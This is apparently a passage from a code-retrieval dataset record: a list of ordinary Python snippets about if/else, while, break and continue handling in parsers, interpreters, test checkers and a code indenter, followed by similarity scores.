debug.show(\"if:False\")\n return None", "def close_conditional_guard(close_conditional):\n for _ in range(close_conditional):\n print(\"#endif\")", "def visitIfElse(self, ctx):\n # type: (RelayParser.IfElseContext) -> expr.If\n cond = self.visit(ctx.expr())\n\n self.enter_var_scope()\n true_branch = self.visit(ctx.body(0))\n self.exit_var_scope()\n\n self.enter_var_scope()\n false_branch = self.visit(ctx.body(1))\n self.exit_var_scope()\n\n return expr.If(cond, true_branch, false_branch)", "def if_function(condition, true_result, false_result):\n if condition:\n return true_result\n else:\n return 
false_result", "def if_function(condition, true_result, false_result):\n if condition:\n return true_result\n else:\n return false_result", "def if_function(condition, true_result, false_result):\n if condition:\n return true_result\n else:\n return false_result", "def if_function(condition, true_result, false_result):\n if condition:\n return true_result\n else:\n return false_result", "def visit_IfNode(self, node: IfNode, symbol_table: SymbolTable) -> Union[List, ReturnNode]:\n for case in node.cases:\n condition = case[0]\n passed_cases = []\n for idx, cond in enumerate(condition):\n result = self.visit(cond, symbol_table)\n passed_cases.append(result)\n expr = case[-1]\n if False in [num.value == 1 for num in passed_cases]:\n pass\n else:\n block_results = []\n for line in [elem for elem in expr if elem is not None]:\n if isinstance(line, ReturnNode):\n return line\n res = self.visit(line, symbol_table)\n block_results.append(res)\n return block_results\n\n if node.else_case:\n expr = node.else_case\n\n block_results = []\n for line in [elem for elem in expr if elem is not None]:\n if isinstance(line, ReturnNode):\n return line\n res = self.visit(line, symbol_table)\n block_results.append(res)\n\n return block_results", "def _While(self, t):\n self.fill(\"while (\")\n self.dispatch(t.test)\n self.write(\")\")\n self.enter()\n self.dispatch(t.body)\n self.leave()\n if t.orelse:\n self.RaiseError(t, \"While else not supported\")", "def whilestmt(self, w):\n invs = self.assemble_invariants(w)\n b_mid = self.flatten([Tree('assume', [w[0]]), w[-1], Tree('assert', invs), Tree('assume', [Tree('const_false', [])])])\n b = self.flatten([Tree('assert', invs),\n self.assemble_havoc(w),\n Tree('assume', invs),\n Tree('wpor', [Tree('block', b_mid), Tree('assume', self._not(w[0]))])])\n return b", "def while_(self):\n if self.line.startswith('wh'):\n if self.line.endswith('while') is False:\n return True", "def _analyse_stmt_If(self, statement: ast.If, *, next: CFNode) -> CFNode:\n # Analyse both branches unconditionally: even if they're not reachable,\n # they still need to exist in the graph produced.\n if_branch = self._analyse_statements(statement.body, next=next)\n else_branch = self._analyse_statements(statement.orelse, next=next)\n\n # Analyse the condition, if a constant.\n branches: Dict[str, CFNode] = {}\n test_is_constant, test_value = self._expression_as_constant(statement.test)\n if test_is_constant:\n if test_value:\n branches.update(enter=if_branch)\n else:\n branches.update(else_=else_branch)\n else:\n branches.update(enter=if_branch, else_=else_branch, error=self._raise)\n\n return self._ast_node(statement, **branches)", "def executeIf(tree,file):\n if(evalBoolean(tree.children[0])):\n explore(tree.children[1],file)", "def test_74_break(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then break;\n\t\t\twith x:integer; do if (x=0) then return;\n\t\tend{with} break; end{while} break; end\"\"\"\n\t\texpect = \"Break Not In Loop\"\n\t\tself.assertTrue(TestChecker.test(input,expect,474))", "def condition_forward_checking(csp, var) :\n return False", "def condition_forward_checking(csp, var) :\n return False", "def newif(line):\n if not line.startswith(\"\\\\newif\"):\n return False\n pieces = line.split(\"\\\\\")\n if len(pieces) != 4 or pieces[0] != \"\" or pieces[1] != \"newif\":\n print(\"%Wrong number of pieces: \"+line)\n return False\n if not pieces[2].startswith(\"if\"):\n 
print(\"%Missing if: \"+line)\n return False\n name = pieces[2][2:]\n if not pieces[3].startswith(name):\n print(\"%Name missing: \"+line)\n return False\n value = pieces[3][len(name):]\n if not value in truth:\n print(\"Misunderstood truth value: \"+line)\n return False\n conditionals[\"\\\\if\"+name] = truth[value]\n return True", "def test_03_pass(self):\n if x==1:\n pass", "def test_condition_split(self):\n self.write_contents(\n 'external/wpt/fail.html.ini', \"\"\"\\\n [fail.html]\n expected:\n if product == \"content_shell\": FAIL\n \"\"\")\n self.update(\n {\n 'run_info': {\n 'product': 'content_shell',\n 'os': 'mac',\n 'port': 'mac12',\n },\n 'results': [{\n 'test': '/fail.html',\n 'status': 'TIMEOUT',\n 'expected': 'FAIL',\n }],\n }, {\n 'run_info': {\n 'product': 'content_shell',\n 'os': 'win',\n 'port': 'win11',\n },\n 'results': [{\n 'test': '/fail.html',\n 'status': 'FAIL',\n 'expected': 'FAIL',\n }],\n }, {\n 'run_info': {\n 'product': 'chrome',\n 'os': 'linux',\n 'port': 'trusty',\n },\n 'results': [{\n 'test': '/fail.html',\n 'status': 'PASS',\n 'expected': 'PASS',\n }],\n },\n overwrite_conditions='yes')\n path = self.finder.path_from_web_tests('external', 'wpt',\n 'fail.html.ini')\n lines = self.tool.filesystem.read_text_file(path).splitlines()\n expected = textwrap.dedent(\"\"\"\\\n [fail.html]\n expected:\n if (product == \"content_shell\") and (os == \"win\"): FAIL\n if (product == \"content_shell\") and (os == \"mac\"): TIMEOUT\n \"\"\")\n # TODO(crbug.com/1299650): The branch order appears unstable, which we\n # should fix upstream to avoid create spurious diffs.\n self.assertEqual(sorted(lines, reverse=True), expected.splitlines())", "def Continue():\n # adjust this to take as many steps as you need\n return warp.top.it <= 500", "def stopIf(self, expr, message):\r\n if expr: self.stop(message)", "def OnInternalStatement(\r\n result: \"Statement.StatementParseResultItem\",\r\n iter_before: NormalizedIterator,\r\n iter_after: NormalizedIterator,\r\n ) -> bool: # True to continue, False to terminate\r\n raise Exception(\"Abstract method\") # pragma: no cover\r", "def makeMove(self, movable_statement):\n ### Student code goes here\n # ToGO:\n # if not(self.isMovableLegal(movable_statement)):\n # pass\n currDisk = movable_statement.terms[0]\n prevPeg = movable_statement.terms[1]\n newPeg = movable_statement.terms[2]\n\n # On next peg\n newOnStatement = Statement()\n newOnStatement.predicate = 'on'\n newOnStatement.terms = [currDisk, newPeg]\n newOnFact = Fact(newOnStatement)\n self.kb.kb_assert(newOnFact) #1\n\n #Not on previous peg\n removeOnStatement = Statement()\n removeOnStatement.predicate = 'on'\n removeOnStatement.terms = [currDisk, prevPeg]\n removeOnFact = Fact(removeOnStatement)\n self.kb.kb_retract(removeOnFact) #2\n\n\n #If Prev Empty Logic\n ONStatement = Statement()\n ONTerm1 = Term('?x')\n ONTerm2 = Term(prevPeg)\n ONStatement.terms = (ONTerm1, ONTerm2)\n ONStatement.predicate = 'on'\n ONFact = Fact(ONStatement)\n if not(self.kb.kb_ask(ONFact)):\n prevEmptyStatement = Statement()\n prevEmptyStatement.terms = [prevPeg]\n prevEmptyStatement.predicate = 'empty'\n prevEmptyFact = Fact(prevEmptyStatement)\n self.kb.kb_assert(prevEmptyFact) #3\n else:\n # previous disk now on top\n # AND\n # Not above previous disk\n abovePrevStatement = Statement()\n aboveTerm = Term('?x')\n abovePrevStatement.terms = [currDisk, aboveTerm]\n abovePrevStatement.predicate = 'Above'\n for fact in self.kb.facts:\n if match(fact.statement, abovePrevStatement):\n prevDisk = 
fact.statement.terms[1]\n self.kb.kb_retract(fact) #7\n break\n prevonTopStatement = Statement()\n prevonTopStatement.predicate = 'onTop'\n prevonTopStatement.terms = [prevDisk, prevPeg]\n prevonTopFact = Fact(prevonTopStatement)\n self.kb.kb_assert(prevonTopFact) #8\n\n # Above next disk\n # If next not empty\n nextEmptyBool = False\n nextEmptyStatement = Statement()\n nextEmptyStatement.terms = [newPeg]\n nextEmptyStatement.predicate = 'empty'\n for fact in self.kb.facts:\n if match(fact.statement, nextEmptyStatement):\n nextEmptyBool = True\n self.kb.kb_retract(fact) #9\n break\n\n if nextEmptyBool == False:\n nextOnTopStatement = Statement()\n nextOnTopStatement.predicate = 'onTop'\n onTopTerm1 = Term('?x')\n nextOnTopStatement.terms = [onTopTerm1, newPeg]\n nextOnTopFact = Fact(nextOnTopStatement)\n for fact in self.kb.facts:\n if match(fact.statement, nextOnTopStatement):\n nextOnTop = fact.statement.terms[0]\n aboveNextStatement = Statement()\n aboveNextStatement.predicate = 'Above'\n aboveNextStatement.terms = [currDisk, nextOnTop]\n aboveNextFact = Fact(aboveNextStatement)\n self.kb.kb_assert(aboveNextFact) #6\n self.kb.kb_retract(nextOnTopFact)\n break\n\n\n\n #On top of new peg\n newonTopStatement = Statement()\n newonTopStatement.predicate = 'onTop'\n newonTopStatement.terms = [currDisk, newPeg]\n newonTopFact = Fact(newonTopStatement)\n self.kb.kb_assert(newonTopFact) #4\n\n #Not on top of previous peg\n removeonTopStatement = Statement()\n removeonTopStatement.predicate = 'onTop'\n removeonTopStatement.terms = [currDisk, prevPeg]\n removeonTopFact = Fact(removeonTopStatement)\n self.kb.kb_retract(removeonTopFact) #5\n\n\n\n\n\n #Destination not empty", "def stopUnless(self, expr, message):\r\n if not expr: self.stop(message)", "def test_skipif_true():\n pass", "def perform(self):\n if self.format_and_eval_string(self.condition):\n raise BreakException()", "def test_35_break(self):\n\t\tinput = \"\"\"function foo():integer; var a:real; begin\n\t\twhile a > 0 do\n\t\twith a:integer;b:boolean; do begin b:=true; break; end\n\t\tbreak; return 1;\n\t\tend\n\t\tprocedure main(); var x:integer; begin x:=foo(); foo(); end\"\"\"\n\t\texpect = \"Break Not In Loop\"\n\t\tself.assertTrue(TestChecker.test(input,expect,435))", "def test_02_pass(self):\n if x==1:\n pass", "def if_then(condition: Callable[[], bool], then_source: ObservableBase,\n else_source: ObservableBase = None) -> ObservableBase:\n from ..operators.observable.ifthen import if_then\n return if_then(condition, then_source, else_source)", "def syntax_for_continue():\n\n for i in range(5):\n if i % 2 == 1:\n continue\n print(i)\n\n ## Output\n # 0\n # 2\n # 4", "def splitflow(self):\n if self.name in conditional_branch:\n return True\n return False", "def test_72_break(self):\n\t\tinput = \"\"\"procedure main(); var x:integer;\n\t\tbegin while(true)do begin\n\t\twith x:integer; do with x:real; do begin\n\t\t\tif (x>0) then break;\n\t\t\twith x:integer; do break;\n\t\tend{with} end{with} foo(); end\"\"\"\n\t\texpect = \"Undeclared Procedure: foo\"\n\t\tself.assertTrue(TestChecker.test(input,expect,472))", "def cg_if_goto(self, cmd):\n label = self.makeLabel(cmd)\n self.asm(unindent(f\"\"\"\n @SP\n AM=M-1 // SP --\n D=M // D = MEM[SP]\n @{label}\n D;JNE // if-goto {label}\n \"\"\"))", "def run(text):\n lines = text.strip(CONST.NEW_LINE).split(CONST.NEW_LINE)\n\n tabs = 0\n diff = 0\n # for multiline conditional\n total_paren_count = 0\n total_conditional_tabs_added = 0\n total_return_tabs_added = 0\n\n indent = 
CONST.EMPTY_STRING\n newtext = CONST.EMPTY_STRING\n tab_space = CONST.TAB\n soql_start_indent = CONST.EMPTY_STRING\n soql_end_indent = CONST.EMPTY_STRING\n\n soql_flag = False\n soql_end_flag = False\n return_flag = False\n no_semicolon_flag = False\n return_paren_flag = False\n open_bracket_flag = False\n last_line_flag = False\n conditonal_flag = False\n\n total_num_of_lines = len(lines)\n for i in range(0, total_num_of_lines):\n orig_line = lines[i]\n line = orig_line.strip()\n\n # handle comments\n if UTILS.is_line_comment(line):\n newtext += orig_line + CONST.NEW_LINE\n continue\n if len(line) == 0:\n newtext += CONST.NEW_LINE\n continue\n\n line_number = i + 1\n # soql in the same line #1\n if UTILS.soql_in_same_line(line):\n indent = tab_space*tabs\n soql_flag = False\n UTILS.preety_print_line(line_number, tabs, 1)\n\n # soql start #2\n elif soql_flag:\n indent = soql_start_indent\n\n # soql end #4\n elif soql_end_flag:\n soql_end_flag = False\n soql_end_indent = CONST.EMPTY_STRING\n soql_start_indent = CONST.EMPTY_STRING\n indent = tab_space*tabs\n\n # default indent #3\n else:\n indent = tab_space*tabs\n\n # multiline return start #5\n if line.startswith(CONST.RETURN) and line[-1] != CONST.SEMICOLON:\n return_flag = True\n tabs += 1\n total_return_tabs_added += 1\n UTILS.preety_print_line(line_number, tabs, 2)\n\n # multiline return end #6\n elif return_flag and CONST.SEMICOLON in line:\n tabs -= total_return_tabs_added\n if (\n line.strip() == '));'\n or line.strip() == ');'\n or line.strip() == '});'\n ):\n indent = tab_space*tabs\n return_flag = False\n total_return_tabs_added = 0\n UTILS.preety_print_line(line_number, tabs, 3)\n\n # multiline conditional start #9\n elif UTILS.is_multiline_loops_and_conditionals(line):\n open_paren, close_paren = (\n UTILS.get_bracket_count(\n line,\n CONST.OPEN_PARENTHESIS,\n CONST.CLOSE_PARENTHESIS\n )\n )\n conditonal_flag = True\n total_paren_count += (open_paren - close_paren)\n if line.startswith(CONST.ELSE_IF):\n tabs -= 1\n indent = tab_space*tabs\n tabs += 1\n total_conditional_tabs_added += 1\n UTILS.preety_print_line(line_number, tabs, 4)\n\n # multiline conditional end #10\n elif conditonal_flag:\n open_paren, close_paren = (\n UTILS.get_bracket_count(\n line,\n CONST.OPEN_PARENTHESIS,\n CONST.CLOSE_PARENTHESIS\n )\n )\n total_paren_count += (open_paren - close_paren)\n diff = (open_paren - close_paren)\n if diff > 0:\n tabs += 1\n total_conditional_tabs_added += 1\n elif diff < 0:\n if total_paren_count == 0:\n conditonal_flag = False\n tabs -= total_conditional_tabs_added\n total_conditional_tabs_added = 0\n if not soql_flag:\n indent = tab_space*(tabs+1)\n UTILS.preety_print_line(line_number, tabs, 5)\n\n # opening bracket line #7\n elif UTILS.is_line_has_open_bracket(line) and not soql_flag:\n if (\n UTILS.is_line_conditional_or_try_catch(line)\n ):\n tabs -= 1\n indent = tab_space*tabs\n elif line == CONST.CLOSE_PARENTHESIS + ' ' + CONST.OPEN_CURLY_BRACKET:\n open_bracket_flag = False\n tabs -= 1\n indent = tab_space*tabs\n else:\n if not no_semicolon_flag and UTILS.is_operator_start(line):\n no_semicolon_flag = True\n tabs += 1\n indent = tab_space*tabs\n tabs += 1\n if return_flag:\n total_return_tabs_added += 1\n if line[-1] == CONST.OPEN_PARENTHESIS:\n open_bracket_flag = True\n UTILS.preety_print_line(line_number, tabs, 6)\n\n # closing bracket line #8\n elif (\n line == CONST.CLOSE_PARENTHESIS + CONST.SEMICOLON\n or line == CONST.CLOSE_CURLY_BRACKET + CONST.SEMICOLON\n or line.startswith(CONST.CLOSE_PARENTHESIS)\n or 
line.startswith(CONST.CLOSE_CURLY_BRACKET)\n and not soql_flag\n ):\n tabs -= 1\n # if string line ends then decrease a tab\n # as it was set earlier\n if no_semicolon_flag and line[-1] == CONST.SEMICOLON:\n tabs -= 1\n no_semicolon_flag = False\n if return_flag:\n total_return_tabs_added -= 1\n indent = tab_space*tabs\n # if line != CONST.CLOSE_PARENTHESIS:\n open_bracket_flag = False\n UTILS.preety_print_line(line_number, tabs, 7)\n\n # rest of the line #11\n elif (\n not return_flag\n and not soql_flag\n and not UTILS.start_soql_query(line)\n and not UTILS.is_character_in_quotes(line, CONST.SEMICOLON)\n and not UTILS.is_line_keywords(line)\n ):\n indent = tab_space*tabs\n if (\n line[-1] != CONST.SEMICOLON\n and not no_semicolon_flag\n and (UTILS.is_operator_start(line) or UTILS.is_operator_end(line))\n ):\n no_semicolon_flag = True\n tabs += 1\n if UTILS.is_operator_start(line):\n indent = tab_space*tabs\n elif no_semicolon_flag and line[-1] == CONST.SEMICOLON:\n no_semicolon_flag = False\n tabs -= 1\n elif UTILS.is_operator_start(line) and line[-1] == CONST.SEMICOLON:\n indent = tab_space*(tabs+1)\n elif open_bracket_flag and line[-1] == CONST.SEMICOLON:\n tabs -= 1\n open_bracket_flag = False\n # else:\n # if not no_semicolon_flag:\n # tabs += 1\n # no_semicolon_flag = True\n UTILS.preety_print_line(line_number, tabs, 8)\n else:\n #indent = tab_space*tabs\n print('🤷🤷‍♀️🤷‍🙄🙄🙄 {}'.format(str(line_number)))\n\n newline = indent + line.rstrip()\n newtext += newline + CONST.NEW_LINE\n\n # if the soql ends in same line then don't set the flags\n if UTILS.start_soql_query(line) and UTILS.end_soql_query(line):\n continue\n\n # handle multiline soql line\n if not UTILS.soql_in_same_line(newline) and UTILS.start_soql_query(newline):\n # find the position in line\n square_bracket_index = 0\n soql_flag = True\n if ': [' in newline:\n square_bracket_index = newline.index(': [') + 4\n elif '= [' in newline:\n square_bracket_index = newline.index('= [') + 4\n elif '([' in newline:\n square_bracket_index = newline.index('([') + 3\n # next lines indent would be indent + diff\n if not soql_start_indent:\n diff = square_bracket_index - len(soql_start_indent) - 1\n else:\n diff = square_bracket_index - len(indent)\n soql_start_indent += (CONST.NEW_STRING * diff) #+ tab_space\n\n # handle soql end line\n if (\n '])' in newline\n or '];' in newline\n or ')];' in newline\n ):\n soql_flag = False\n soql_end_flag = True\n new_len = len(indent)-diff\n soql_end_indent = CONST.NEW_STRING * new_len\n\n # Handle unindented lines\n if (\n line_number != total_num_of_lines\n and not last_line_flag\n and tabs == 0\n ):\n print('😱😱😱😱😱😱😱😱😱😱')\n UTILS.preety_print_line(line_number, tabs, -1)\n print('👽👽👽👽👽👽👽👽👽👽')\n last_line_flag = True\n\n # remove the last '\\n'\n newtext = newtext[:-1]\n if tabs == 0:\n print('\\n🙀🐾If I fits, I sits🐾🐈')\n else:\n print('\\n🏇🔫🤖Indentation not done properly.🤖🔫🏇')\n return newtext", "def ready_to_proceed(self):\n if self.current_step is None or self.step_position == StepPosition.Before:\n return False\n\n for condition, _ in self.current_step.conditions:\n if condition.satisfied():\n return True\n return False", "def skipIf(condition, reason):\r\n if condition:\r\n return skip(reason)\r\n return _id" ]
[ "0.6381344", "0.6276441", "0.6248517", "0.6244961", "0.62422997", "0.61599344", "0.6136429", "0.6136429", "0.5794875", "0.5792966", "0.575992", "0.57597315", "0.5758323", "0.5756217", "0.573461", "0.56686", "0.5654149", "0.5635589", "0.5634545", "0.563404", "0.5616345", "0.5601915", "0.55984026", "0.5582077", "0.5566953", "0.5562973", "0.55500007", "0.55444866", "0.55400145", "0.5538579", "0.55090374", "0.5503659", "0.5494274", "0.54169255", "0.5401358", "0.53924596", "0.5387151", "0.53868914", "0.53790534", "0.5372475", "0.5368965", "0.53685147", "0.53615886", "0.53567946", "0.53489697", "0.5322286", "0.53163266", "0.5314488", "0.53074825", "0.5301719", "0.5289654", "0.5273167", "0.5270293", "0.5231625", "0.52294654", "0.52289724", "0.52187324", "0.5217503", "0.5204851", "0.5199182", "0.5193867", "0.5177218", "0.5169233", "0.5153155", "0.514452", "0.5142351", "0.513704", "0.51342666", "0.51342666", "0.51342666", "0.51342666", "0.5129158", "0.5124027", "0.51175416", "0.51015025", "0.50934756", "0.5092529", "0.5090652", "0.5079576", "0.5079576", "0.50795174", "0.5064467", "0.5056287", "0.505537", "0.50524217", "0.5037574", "0.5024883", "0.50213397", "0.50196487", "0.50076085", "0.50007665", "0.4988471", "0.49834934", "0.49762583", "0.49658078", "0.49576542", "0.49571732", "0.49568102", "0.49556482", "0.4951415" ]
0.741904
0
Define a user-defined function. 470 DEF FND(D)=SQR((K(I,1)-S1)^2+(K(I,2)-S2)^2)
def stmt_def(executor, stmt: ParsedStatementDef):
    executor.put_symbol(stmt._variable, stmt._tokens, SymbolType.FUNCTION, stmt._function_arg)
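    # The tokens of the right-hand side are stored rather than a computed value,
    # which presumably lets a later reference such as FND(X) bind X to the declared
    # argument and re-evaluate the expression; the evaluation itself would live elsewhere.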
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dmy_fn(x):\n return 0.4*(2.0*(np.exp(x*4) + np.exp(-x*4)) - 8 + 0.6*x - 6*x**2)", "def calculate_fn_value(self) :\r\n\r\n self.fn_value = self.gn_value + self.hn_value #f(n) = g(n) + h(n)\r", "def d2f2dx1x5_func(self,X):\n return(\n -(self.rj**2)*self.rm*self.k_spr*(self.b_spr**2) * (\n np.exp(self.b_spr*(self.rm*X[4] + self.rj*X[0]))\n * ((self.rm*X[4] + self.rj*X[0])>=0)\n ) / self.Ij\n )", "def fval_function(sN, weight):\r\n # IMPLEMENT\r\n\r\n # Many searches will explore nodes (or states) that are ordered by their f-value.\r\n # For UCS, the fvalue is the same as the gval of the state. For best-first search, the fvalue is the hval of the state.\r\n # You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\r\n # The function must return a numeric f-value.\r\n # The value will determine your state's position on the Frontier list during a 'custom' search.\r\n # You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\r\n\r\n\r\n return (1 - weight) * sN.gval + weight * sN.hval", "def func_ludwigson(eps,k1,n1,k2,n2,):\n return k1*eps**n1+np.exp(k2+n2*eps)", "def mul_fns(f_and_df, g_and_dg):\n \"*** YOUR CODE HERE ***\"", "def f(x, a, d1, d2):\n A = 10*a\n D1 = 10*d1\n D2 = 10*d2\n y = e * (frequency) * (1e9) * ( np.exp(-np.exp(-A*x+D1)) + np.exp(-np.exp(-A*x+D2)) + N)\n return y", "def df2dx5_func(self,X):\n result = (\n -self.rj*self.rm*self.k_spr*self.b_spr * (\n np.exp(self.b_spr*(self.rm*X[4] + self.rj*X[0]))\n * ((self.rm*X[4] + self.rj*X[0])>=0)\n ) / self.Ij\n )\n return(result)", "def SIDFT(X,D):\n N=len(X)\n x=np.zeros(N,'complex')\n for n in range(0,N,1):\n for k in range(0,N,1):\n x[n]=x[n]+np.exp(-1j*2*np.pi*k*D/N)*X[k]*np.exp(1j*2*np.pi*k*n/N)\n return x/N", "def fval_function(sN, weight):\n#IMPLEMENT\n \n #Many searches will explore nodes (or states) that are ordered by their f-value.\n #For UCS, the fvalue is the same as the gval of the state. 
For best-first search, the fvalue is the hval of the state.\n #You can use this function to create an alternate f-value for states; this must be a function of the state and the weight.\n #The function must return a numeric f-value.\n #The value will determine your state's position on the Frontier list during a 'custom' search.\n #You must initialize your search engine object as a 'custom' search engine if you supply a custom fval function.\n return 0", "def f(self, (k,t), (J,q,dq), **params):\n f = 0.*q\n return f", "def ffn(input, d_hid, d_size, name=\"ffn\"):\n hidden = fluid.layers.fc(input=input,\n size=d_hid,\n num_flatten_dims=1,\n param_attr=fluid.ParamAttr(name=name + '_innerfc_weight'),\n bias_attr=fluid.ParamAttr(\n name=name + '_innerfc_bias',\n initializer=fluid.initializer.Constant(0.)),\n act=\"leaky_relu\")\n #return hidden\n out = fluid.layers.fc(input=hidden,\n size=d_size,\n num_flatten_dims=1,\n param_attr=fluid.ParamAttr(name=name + '_outerfc_weight'),\n bias_attr=fluid.ParamAttr(\n name=name + '_outerfc_bias',\n initializer=fluid.initializer.Constant(0.)))\n return out", "def f1(x):\n return x**3 - 2*x + 2", "def f_2(c):\n Di = calc_R(*c)\n return Di", "def my_fn(x):\n return 0.4*(0.5*(np.exp(x*4) - np.exp(-x*4)) - 8*x + 0.3*x**2 - 2*x**3 + 0.8)", "def fn(x):\n\n # coefficients\n A = 728.0\n B = 0.317\n C = 0.486\n D = -8.99 * 1.6\n\n # function\n fx = - D / x**2 - A / B * math.exp(- x / B) + 6 * C / x**7\n\n return fx", "def func1(x,u):\r\n return 5*x*u+(x+7)*np.sin(x)", "def func(x,D,a):\n return D*x**a", "def dalf(x):\n return grad(alf)(x)", "def gradFun(self, S, x):", "def f2n(f):\n k = 4.0 * np.pi**2 * codata.value('electron mass') * codata.value('electric constant') / codata.value('elementary charge')**2\n return k * f**2", "def grad_f3(x):\n pass", "def get_func(k_center,enk,I,gamma,gamma_k):\n\n def lorentzian_k(k):\n return 1./np.pi * gamma_k / ( (k-k_center)**2 + gamma_k**2)\n\n def lorentzian(k,omega):\n return I * gamma / ( (omega-enk)**2 + gamma**2) * lorentzian_k(k)\n\n return lorentzian", "def function(self):\r\n lambd = 5*np.sin(2*np.pi*self.x_array) #The function in question\r\n return 3*np.pi*np.exp(-lambd)", "def F(x):\n return math.exp(-0.5 * (x ** 2))", "def F(self, (k,t), (j,x), **params):\n d = len(x)/2\n q,dq = x[:d],x[d:]\n J = j\n M = self.M( (k,t), (J,q,dq), **params )\n f = self.f( (k,t), (J,q,dq), **params )\n c = self.c( (k,t), (J,q,dq), **params )\n Da = self.Da( (k,t), (J,q), **params )\n Db = self.Db( (k,t), (J,q), **params )\n D = np.vstack((Da,Db))\n lambda_ = self.lambda_( (k,t), (J,q,dq), **params )\n ddq = util.dot( la.inv(M), f + util.dot(c,dq) + util.dot(lambda_, D) )\n dx = np.hstack((dq,ddq))\n return dx", "def d2f2dx1x3_func(self,X):\n return(\n -(self.rj**2)*self.rm*self.k_spr*(self.b_spr**2) * (\n np.exp(self.b_spr*(self.rm*X[2] - self.rj*X[0]))\n * ((self.rm*X[2] - self.rj*X[0])>=0)\n ) / self.Ij\n )", "def n2f(n):\n k = 4.0 * np.pi**2 * codata.value('electron mass') * codata.value('electric constant') / codata.value('elementary charge')**2\n return np.sqrt(n/k)", "def my_square(d):asaasasassssssssssssssssssssssssss\n\t return (d ** 3)", "def f(k):\n return k * k * k * k * pk(k, suppression) * spherical_jn(2, k * r)", "def F(k0):\r\n assert((not np.any(np.isnan(k0))) and np.all(np.isfinite(k0)) and\r\n np.all(np.isreal(k0))),\\\r\n \"k0 must be real, finite and not NaN\"\r\n assert(len(k0) == 4), \"K must have length 4\"\r\n assert(hasattr(F, '__call__')), \\\r\n \"F must be a callable function\"\r\n k1 = np.array([k0[0], 
k0[1]])\r\n k2 = np.array([k0[2], k0[3]])\r\n f1 = k1 - np.array([f(t + dt / 3,\r\n qn + (dt / 12) * (5 * k1 - k2), r, e, w)])\r\n f2 = k2 - np.array([f(t + dt,\r\n qn + (dt / 4) * (3 * k1 + k2), r, e, w)])\r\n f3 = np.reshape(np.array([f1, f2]), (4,))\r\n return f3", "def f(k):\n return k * k * pk(k, suppression) * spherical_jn(0, k * r)", "def f(k):\n return k * k * k * pk(k, suppression) * spherical_jn(1, k * r)", "def func(x, f, fp):\n\n return np.sqrt((1+fp(x)**2) / (2 * g * f(x)))", "def _partial_derivative_f2(self, f1, f2, m_star, n):\r\n if f1 > 0 and f2 > 0:\r\n a_0 = self._calculate_a_0(f1, f2, n)\r\n term1 = (f1 ** 2) * (1 - a_0 ** m_star)\r\n term2 = 2 * (f2 ** 2)\r\n term3 = (m_star * f1) * (a_0 ** (m_star - 1))\r\n term4 = n * f2\r\n return 1 - (term1 / term2) + (term3 / term4)\r\n else:\r\n a_1 = self._calculate_a_1(f1, f2, n)\r\n term1 = (m_star * f1) * a_1 ** (m_star - 1)\r\n term2 = n * (f2 + 1)\r\n term3 = (f1 * (f1 - 1)) * (1 - a_1 ** m_star)\r\n term4 = 2 * (f2 + 1) ** 2\r\n return 1 + (term1 / term2) - (term3 / term4)", "def shape_function_deriv(self, idx, x):\n if idx == 0:\n return -0.5\n elif idx == 1:\n return 0.5\n elif idx == 2:\n return 2*x*sqrt(3./2)/2\n elif idx == 3:\n return (3*x**2-1)*sqrt(5./2)/2\n elif idx == 4:\n return (20*x**3-12*x)*sqrt(7./2)/8\n elif idx == 5:\n return (28*x**3-20*x)*sqrt(9./2)/8\n elif idx == 6:\n return (126*x**5-140*x**3+30*x)*sqrt(11./2)/16\n elif idx == 7:\n return (198*x**5-252*x**3+70*x)*sqrt(13./2)/16\n elif idx == 8:\n return (3432*x**7-5544*x**5+2520*x**3-280*x)*sqrt(15./2)/128\n elif idx == 9:\n return (-840*x + 5544*x**3 - 10296*x**5 + 5720*x**7)*sqrt(17./2)/128\n elif idx == 10:\n return (630*x - 9240*x**3 + 36036*x**5 - 51480*x**7 + 24310*x**9)*sqrt(19./2)/256\n raise NotImplementedError(\"Such shape function is not implemented yet (i=%d)\" % i)", "def dfdx(self, X):\n \n return 3*(X[0])**2", "def get_stream_function_doublet(strength, xd, yd, X, Y):\n psi = - strength / (2 * math.pi) * (Y - yd) / ((X - xd) ** 2 + (Y - yd) ** 2)\n\n return psi", "def f(k):\n return k * k * k * k * pk(k, suppression) * spherical_jn(0, k * r)", "def f2(x):\n return x**2 + 2 * x + 1", "def f4(x):\n return sin(x)/x", "def compute_f_CHEN(self, R, e, D):\n upper_RHS_LHS = e/D\n lower_RHS_LHS = 3.7065\n \n log_square = log((((upper_RHS_LHS)**1.1096)/2.8257) + (7.149/R)**0.8961, 10)\n LHS_RHS_RHS = (5.0452/R) * log_square\n \n curly_bracket = (upper_RHS_LHS / lower_RHS_LHS) - LHS_RHS_RHS\n \n RHS = (-4)*log(curly_bracket, 10)\n f = (1/RHS)**2\n\n return f", "def dnde_photon_spectrum_fns(\n self,\n) -> Dict[str, Callable[[Union[float, npt.NDArray[np.float64]], float], float]]:\n\n def dnde_zero(e, _: float):\n return np.zeros_like(e)\n\n def wrap(f):\n @functools.wraps(f)\n def fnew(*args, **kwargs):\n return f(self, *args, **kwargs)\n\n return fnew\n\n return {\n \"e e\": wrap(dnde_photon_e_e),\n \"mu mu\": wrap(dnde_photon_mu_mu),\n \"ve ve\": dnde_zero,\n \"vt vt\": dnde_zero,\n \"vm vm\": dnde_zero,\n \"pi pi\": wrap(dnde_photon_pi_pi),\n \"k0 k0\": wrap(dnde_photon_k0_k0),\n \"k k\": wrap(dnde_photon_k_k),\n \"pi0 gamma\": wrap(dnde_photon_pi0_gamma),\n \"eta gamma\": wrap(dnde_photon_eta_gamma),\n \"pi0 phi\": wrap(dnde_photon_pi0_phi),\n \"eta phi\": wrap(dnde_photon_eta_phi),\n \"eta omega\": wrap(dnde_photon_eta_omega),\n \"pi0 pi0 gamma\": wrap(dnde_photon_pi0_pi0_gamma),\n \"pi pi pi0\": wrap(dnde_photon_pi_pi_pi0),\n \"pi pi eta\": wrap(dnde_photon_pi_pi_eta),\n \"pi pi etap\": wrap(dnde_photon_pi_pi_etap),\n \"pi pi omega\": 
